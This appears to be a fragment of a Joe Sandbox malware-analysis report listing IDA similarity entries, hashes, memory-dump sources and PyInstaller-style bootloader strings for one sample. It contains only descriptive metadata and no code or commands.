                                                                                                                                                                                                                                                                                                  • Opcode ID: 3c25247ae15e209603ec1042d904b34171e82564d0ea1a98edeaeffe93ffac02
                                                                                                                                                                                                                                                                                                  • Instruction ID: 028051e74704c2e4e5fa8169fed29e5301feeea3de352719336fe48ee970cab9
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3c25247ae15e209603ec1042d904b34171e82564d0ea1a98edeaeffe93ffac02
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 71517436B1869182E7349B29D040AA8F7A0FB55B58FB45136CE4D177A4CB3AEA42C760
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                  • Opcode ID: cbef8b130d79a7ad9bd62ede7a83548c92a3f011a0e32d449ba268992e3839f7
                                                                                                                                                                                                                                                                                                  • Instruction ID: f32bfd706702309b2fee996e46a18e7a413bc0f0d7180ff32ae6565c42b6d7ae
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cbef8b130d79a7ad9bd62ede7a83548c92a3f011a0e32d449ba268992e3839f7
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5D517436B186D185E7249B29C044ABCA7A1FB85B58FB44132CE4E177B4CB3AED42D750
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                  • Opcode ID: 8494ecf62f03c1d3943c1d589e4c29644468de266d09ee5189585ab02985f6c2
                                                                                                                                                                                                                                                                                                  • Instruction ID: 226b767702daf94ea08cf845326fd4565841c010c0785cd541212db542463206
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8494ecf62f03c1d3943c1d589e4c29644468de266d09ee5189585ab02985f6c2
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3751B436B186D182E7249B28D041ABCE7A1FB44F58FB44132CF4C577A5CB3AEA52C760
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                  • Opcode ID: d4595b9fb9fef9db7488d00d8b5cf28c2737f3b7c2e6c847ec82cdef55389f28
                                                                                                                                                                                                                                                                                                  • Instruction ID: ed9b4e6c298300648a338855ca7ee01f5660dccf40f85a2ce52fd80e0db108f6
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d4595b9fb9fef9db7488d00d8b5cf28c2737f3b7c2e6c847ec82cdef55389f28
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EF516336B1869185E7249B29D040BB8B7A1FBC9B58FB45132CE4E577B4CB3AE842C750
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                  • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                                                                                                  • Instruction ID: 50d7c2797c33c513ec4ef873e821bed3ccceaef95b05898b6a2ec5277c3c85fe
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4541E372B0D7CA44E96199184504EF4A6C4BF227B0DF852B6DD9D173FAEC0D258AC220
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 485612231-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 2970ddd5f501fe71afef01217e103934546d8fb7f20af68bec1b913dc8647c23
                                                                                                                                                                                                                                                                                                  • Instruction ID: 332b5c72d3dd9b389606513a38ba4fd91d0febade8d8d49bba16c20dcb42589c
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2970ddd5f501fe71afef01217e103934546d8fb7f20af68bec1b913dc8647c23
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F411872718A9481FF14DF6AD9145A9B3A1B748FD0B989033EE0D87B68DE3DD442C310
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                  • Opcode ID: 07f4a39e9cc2ad1441a8aa1ffea777e60b39e7c177a4820a8f2f9fbe0e0676c5
                                                                                                                                                                                                                                                                                                  • Instruction ID: 2e51b498c67e85136621a3a1a42f3b142d8c3cc6f5ea1c63564e98c9170164ce
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 07f4a39e9cc2ad1441a8aa1ffea777e60b39e7c177a4820a8f2f9fbe0e0676c5
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6F31B432709BC242E764EB26A4405BDA6D5BBC4B90F64533AEA4D53BE6DF3CD402C714
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                  • Opcode ID: dada551c461b21fdad657b6bac4cbdfad31b05eb9b59333086b2e0a15b162055
                                                                                                                                                                                                                                                                                                  • Instruction ID: 011a1c386ea5cd552620972b0a35212e9d06c9f6766392f2f7d1894fde6a799b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dada551c461b21fdad657b6bac4cbdfad31b05eb9b59333086b2e0a15b162055
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0EF06271B182958AEBA49F29A842669B7D0F7883D5FE0D07AE68D83F14D63C9060CF14
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                  • Opcode ID: 5749315d7b24dceccc8714b5042f108a7de79c1631c17c6a95dc8ed6b888950b
                                                                                                                                                                                                                                                                                                  • Instruction ID: 231adb4ad834cbbf5489981ba021cb245bca824fd0fafbade151e58c5441ef17
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5749315d7b24dceccc8714b5042f108a7de79c1631c17c6a95dc8ed6b888950b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 69A00131959886D0E645AB11A8500B0A620FB51344BA00032D10D820A0DF2CA545C220
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AddressProc
                                                                                                                                                                                                                                                                                                  • String ID: Failed to get address for PyConfig_Clear$Failed to get address for PyConfig_InitIsolatedConfig$Failed to get address for PyConfig_Read$Failed to get address for PyConfig_SetBytesString$Failed to get address for PyConfig_SetString$Failed to get address for PyConfig_SetWideStringList$Failed to get address for PyErr_Clear$Failed to get address for PyErr_Fetch$Failed to get address for PyErr_NormalizeException$Failed to get address for PyErr_Occurred$Failed to get address for PyErr_Print$Failed to get address for PyErr_Restore$Failed to get address for PyEval_EvalCode$Failed to get address for PyImport_AddModule$Failed to get address for PyImport_ExecCodeModule$Failed to get address for PyImport_ImportModule$Failed to get address for PyList_Append$Failed to get address for PyMarshal_ReadObjectFromString$Failed to get address for PyMem_RawFree$Failed to get address for PyModule_GetDict$Failed to get address for PyObject_CallFunction$Failed to get address for PyObject_CallFunctionObjArgs$Failed to get address for PyObject_GetAttrString$Failed to get address for PyObject_SetAttrString$Failed to get address for PyObject_Str$Failed to get address for PyPreConfig_InitIsolatedConfig$Failed to get address for PyRun_SimpleStringFlags$Failed to get address for PyStatus_Exception$Failed to get address for PySys_GetObject$Failed to get address for PySys_SetObject$Failed to get address for PyUnicode_AsUTF8$Failed to get address for PyUnicode_Decode$Failed to get address for PyUnicode_DecodeFSDefault$Failed to get address for PyUnicode_FromFormat$Failed to get address for PyUnicode_FromString$Failed to get address for PyUnicode_Join$Failed to get address for PyUnicode_Replace$Failed to get address for Py_DecRef$Failed to get address for Py_DecodeLocale$Failed to get address for Py_ExitStatusException$Failed to get address for Py_Finalize$Failed to get address for Py_InitializeFromConfig$Failed to get address for Py_IsInitialized$Failed to get address for Py_PreInitialize$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                                                                                                  • API String ID: 190572456-4266016200
                                                                                                                                                                                                                                                                                                  • Opcode ID: cf77275b4bf0387ff900e5ea28e17749df250fc4abdfb995cff073003fe970f9
                                                                                                                                                                                                                                                                                                  • Instruction ID: f3837f3a9d02b046e50eb668deb91ae31c5d4856c59fcc566f5fc5218232a578
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cf77275b4bf0387ff900e5ea28e17749df250fc4abdfb995cff073003fe970f9
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8A12B074A1FB8394FA96BB4AAC501F0A2A1BF45760BF45437C91E473A4EF7CE558C220
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Message_fread_nolock
                                                                                                                                                                                                                                                                                                  • String ID: %s%c%s$Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$\$fread$fseek$malloc
                                                                                                                                                                                                                                                                                                  • API String ID: 3065259568-2316137593
                                                                                                                                                                                                                                                                                                  • Opcode ID: eb36bb45857c16b44edd36685c31993014ae0f224cc39bafccf1feedf175797d
                                                                                                                                                                                                                                                                                                  • Instruction ID: 1b9aa32740dfbd6eef897ca329c60c8c8f8cbc47d99188de9f591da529a1ba92
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eb36bb45857c16b44edd36685c31993014ae0f224cc39bafccf1feedf175797d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6C519331B296C345FA20B725A8516FAA394BF85784FE04033EE4E47B96EE7CE545C320
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                                                                                  • String ID: P%
                                                                                                                                                                                                                                                                                                  • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                                                                                  • Opcode ID: 7645c0c2d2fce03d3aab2d1fd33ee4a3925b53edade4cf92fedf68089910dc30
                                                                                                                                                                                                                                                                                                  • Instruction ID: c4d21a4a97cf4a4292a01ae01d7b6fe45d40bcc24e243dc856f366a3769741a6
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7645c0c2d2fce03d3aab2d1fd33ee4a3925b53edade4cf92fedf68089910dc30
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C951E736618BA186D6249F26A4181BAF7A1F798B61F104126EBCE43695DF3CD085DB20
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                  • String ID: -$:$f$p$p
                                                                                                                                                                                                                                                                                                  • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                                                                                  • Opcode ID: c6ac63e3974c66327622d921c1304357062fd3cb2bcbfe9c56688102bfb98152
                                                                                                                                                                                                                                                                                                  • Instruction ID: 28d34d712563fbb606df792e366f8e16d5b8a6b120df94383aed13c6675c2bf9
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c6ac63e3974c66327622d921c1304357062fd3cb2bcbfe9c56688102bfb98152
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DE125D72F0819386FB24AA14D154AF9A6A1FB80754FE48137E69D476E4FF3CE484CB24
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                  • String ID: f$f$p$p$f
                                                                                                                                                                                                                                                                                                  • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                                                                                  • Opcode ID: 7160b50ef5c5d9843a5fd5f0d5cd643ebb1f382f7049b3f2f81a6a7c29ab944c
                                                                                                                                                                                                                                                                                                  • Instruction ID: 87487d1d3ffb3d567f85639662f1178ef90672955b3b744dcca747892c7b509c
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7160b50ef5c5d9843a5fd5f0d5cd643ebb1f382f7049b3f2f81a6a7c29ab944c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3E125D72F0828386FB60AA55A054AF9A261FB80750FE44137E69F477E4DB7CE480CB20
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
